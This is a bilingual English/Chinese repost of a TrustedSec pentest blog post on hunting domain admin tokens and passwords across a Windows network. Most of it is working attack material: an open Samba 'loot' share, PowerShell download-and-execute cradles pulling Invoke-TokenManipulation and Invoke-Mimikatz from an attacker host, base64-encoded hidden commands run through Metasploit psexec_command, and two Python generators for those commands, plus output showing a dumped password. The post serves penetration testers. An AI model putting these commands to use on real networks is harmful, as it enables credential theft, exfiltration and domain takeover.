source: https://www.trustedsec.com/january-2015/account-hunting-invoke-tokenmanipulation/
I’ve been searching quite a while now for the best way to search for domain admin tokens, once admin rights are attained on a large number of systems during a pentest. Normally, I run “psexec_loggedin_users” within Metasploit, spool the output to a file, then egrep it for users in the “Domain Admins” group. This often works, but can easily miss systems that have a domain admin kerberos security token still loaded in memory. There are a couple of “Token_Hunter” post modules, but you need to have a shell on the systems to run them, which can take a long time to establish, load incognito, and list tokens. As much as I love shellz, I certainly don’t care to have a couple thousand of them connecting back to my machine. So, I think I’ve finally pieced together a viable method from a couple of articles posted around the Internet.
在渗透测试中,得到一些admin权限后,寡人都会寻找搜索域管理员令牌的最好办法。通常情况下,我在metasploit里运行“psexec_loggedin_users,j结果输出到一个文件,然后egrep出“域管理员”组的用户。这往往是有效的,但要是有个域管理员Kerberos安全令牌仍然在内存中加载,俺们就要错过他了。这有一组“token_hunter”后的模块,你需要有个shell来运行它们,这需要很长时间才能建立,隐藏负载,整理token。如同我爱shellz,我当然不会介意几千人回连到我的机器。所以,我想我终于从网上的文章中拼凑出个可行的方法。
The first article is from Chris Campbell posted on PentestGeek. It shows us how to download and execute a PowerSploit module using PowerShell, all in memory. A couple of posts have described utilizing this method with Invoke-Mimikatz.ps1, so why not Invoke-TokenManipulation.ps1? For reference: Carnal0wnage, HarmJoy
第一篇文章是克里斯坎贝尔贴在pentestgeek上的。印象中,它告诉我们如何用PowerShell下载并执行一个powersploit模块。一些帖子有用invoke-mimikatz.ps1来实现,但为什么不用invoke-tokenmanipulation.ps1呢?参考资料:carnal0wnage harmjoy,
To setup the environment, I first downloaded PowerSploit to my apache directory:
要安装环境,首先我下了powersploit到Apache目录:
1 2 | cd /var/www/ git clone https://github.com/mattifestation/PowerSploit.git |
Then configured Samba with an open share to capture the output files:
然后配置Samba开放共享来捕获输出文件:
|
1
2
3
4
5
6
7
8
|
nano /etc/samba/smb.conf
[loot$]
comment = Loot
path = /root/loot
browseable = yes
read Only= no
guest ok = yes
public = yes
|
Then create the folder and grant full permissions. I created a folder named “tokens” under “loot”.
Then, I stole the “PowerShell encoding” section from David Kennedy’s “unicorn” script to encode the following string:
然后创建文件夹授予完全权限。我在‘loot‘下创建了一个文件夹命名为“token”。
然后,我偷偷拿走戴维甘乃迪的“unicorn”脚本里的“PowerShell encoding”来编码下面的字符串:
1 | IEX (New-Object Net.WebClient).DownloadString(“http://<attacker_ip>/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1");Invoke-TokenManipulation -Enumerate |Out-File -Encoding "UTF8" -FilePath \\<attacker_ip>\loot$\tokens\$env:computername.txt |
This will download “Invoke-TokenManipulation.ps1” from my web host, execute it within memory to enumerate tokens, and pipe the output to my SMB share into a file named as the computer.
Now, I just use the “psexec_command” module within Metasploit to execute my encoded string on all systems and rain down tokens into my share.
这将从我的网站主机下载”Invoke-TokenManipulation.ps1”,在内存执行,枚举token,输出到我的SMB共享的文件夹,文件以那台计算机命名。
现在,我在metasploit里用“psexec_command”模块于所有系统中来执行我编码的字符串,然后token雨点般进入我的共享文件夹。
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
msf auxiliary(psexec_command) > info
Name: Microsoft Windows Authenticated Administration Utility
Module: auxiliary/admin/smb/psexec_command
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Royce Davis @R3dy__
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND yes The command you want to execute on the remote host
RHOSTS 192.168.81.10 yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain pwnt.com no The Windows domain to use for authentication
SMBPass LoveGoats! no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser TrustedSec no The username to authenticate as
THREADS 255 yes The number of concurrent threads
WINPATH WINDOWS yes The name of the remote Windows directory
Description:
This module uses a valid administrator username and password to
execute an arbitrary command on one or more hosts, using a similar
technique than the "psexec" utility provided by SysInternals. Daisy
chaining commands with ‘&‘ does not work and users shouldn‘t try it.
This module is useful because it doesn‘t need to upload any binaries
to the target machine.
References:
http://cvedetails.com/cve/1999-0504/
http://www.osvdb.org/3106
http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access
http://sourceforge.net/projects/smbexec/
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
msf auxiliary(psexec_command) > set command powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA
command => powershell -nop -win hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADgAMQAuADIAMQA5AC8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACIAKQA7AEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAgAHwATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIAAiAFUAVABGADgAIgAgAC0ARgBpAGwAZQBQAGEAdABoACAAXABcADEAOQAyAC4AMQA2ADgALgA4ADEALgAyADEAOQBcAGwAbwBvAHQAJABcAHAAYQBzAHMAdwBvAHIAZABzAFwAJABlAG4AdgA6AGMAbwBtAHAAdQB0AGUAcgBuAGEAbQBlAC4AdAB4AHQA
msf auxiliary(psexec_command) > run
[*] 192.168.81.10:445 - Executing the command...
[+] 192.168.81.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] checking if the file is unlocked
[*] 192.168.81.10:445 - Unable to get handle: The server responded with error: STATUS_SHARING_VIOLATION (Command=45 WordCount=0)
[-] Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.81.10:445 - Getting the command output...
[*] 192.168.81.10:445 - Command finished with no output
[*] 192.168.81.10:445 - Executing cleanup...
[-] 192.168.81.10:445 - Unable to cleanup \WINDOWS\Temp\GkdedgMwXOVyHble.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.10:445 - Unable to cleanup. Maybe you‘ll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
|
Then, just egrep the files to enumerate any domain admins.
然后,egrep文件列举任何域管理员。
1 2 | root@trustedsec4-lin:~/loot/tokens# egrep -i ‘trustedsec|admin‘ * /dev/null PWNT-DC.txt:Username : TrustedSec |
All that’s left is to pop a shell on that system, impersonate their token, and escalate privileges on the domain.
The “encoding” script was easily modified for Mimikatz as well (it writes to “loot$/passwords/”). To grep the file for a specific user’s password:
剩下的就是在系统pop个shell,模仿他们的令牌,提权域。
“encoding”的脚本很容易把mimikatz加进去以及(写进“loot$/passwords/”)。grep文件出特定用户的密码:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
root@trustedsec4-lin:~/loot/passwords# grep -A 2 TrustedSec * /dev/null
PWNT-DC.txt:User Name : TrustedSec
PWNT-DC.txt-Domain : PWNT
PWNT-DC.txt-SID : S-1-5-21-999999-88888888888-12000000000-1000
--
PWNT-DC.txt:
* Username : TrustedSec
PWNT-DC.txt-
* Domain : PWNT
PWNT-DC.txt-
* NTLM :
--
PWNT-DC.txt:
* Username : TrustedSec
PWNT-DC.txt-
* Domain : PWNT
PWNT-DC.txt-
* Password : LoveGoats!
|
脚本都在下面了. Happy Hunting!
TokenHunter.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | #!/usr/bin/env python # This download "Invoke-TokenManipulation.ps1" from the attacker‘s webhost, # then execute the script in memory and pipe its output ot the attacker‘s SMB share # "\\loot$\tokens\". # # Formulated mainly from the following articles/tools # https://www.pentestgeek.com/2013/09/18/invoke-shellcode/ # http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html # http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/ # https://github.com/trustedsec/unicorn # # Script Dependency # https://github.com/mattifestation/PowerSploit/tree/master/Exfiltration # # TrustedSec import base64 attacker_ip = " # Main guts def main(): powershell_code = "IEX (New-Object Net.WebClient).DownloadString(\"http://" + attacker_ip + "/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1\");Invoke-TokenManipulation -Enumerate |Out-File -Encoding \"UTF8\" -FilePath \\\\" + attacker_ip + "\\loot$\\tokens\\$env:computername.txt" full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode(‘utf_16_le‘)) print full_attack # Standard boilerplate to call the main() function if __name__ == ‘__main__‘: main() |
PasswordHunter.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
#!/usr/bin/env python
# This download "Invoke-Mimikatz.ps1" from the attacker‘s webhost,
# then execute the script in memory and pipe its output ot the attacker‘s
SMB share
# "\\loot$\passwords\".
#
# Formulated mainly from the following articles/tools
# https://www.pentestgeek.com/2013/09/18/invoke-shellcode/
# http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
# http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/
# https://github.com/trustedsec/unicorn
#
# TrustedSec
import
base64
attacker_ip
=
"
# Main guts
def
main():
powershell_code
=
"IEX (New-Object Net.WebClient).DownloadString(\"http://"
+
attacker_ip
+
"/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1\");Invoke-Mimikatz
-DumpCreds |Out-File -Encoding \"UTF8\" -FilePath \\\\"
+
attacker_ip
+
"\\loot$\\passwords\\$env:computername.txt"
full_attack
=
"powershell -nop -win hidden -noni -enc "
+
base64.b64encode(powershell_code.encode(‘utf_16_le‘))
print
full_attack
# Standard boilerplate to call the main() function
if
__name__
==
‘__main__‘:
main()
|
(我翻译完了, 个人理解,这是个批量获得用户token和密码的东东)
Account Hunting for Invoke-TokenManipulation 伪造token前的账号猎取
京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有 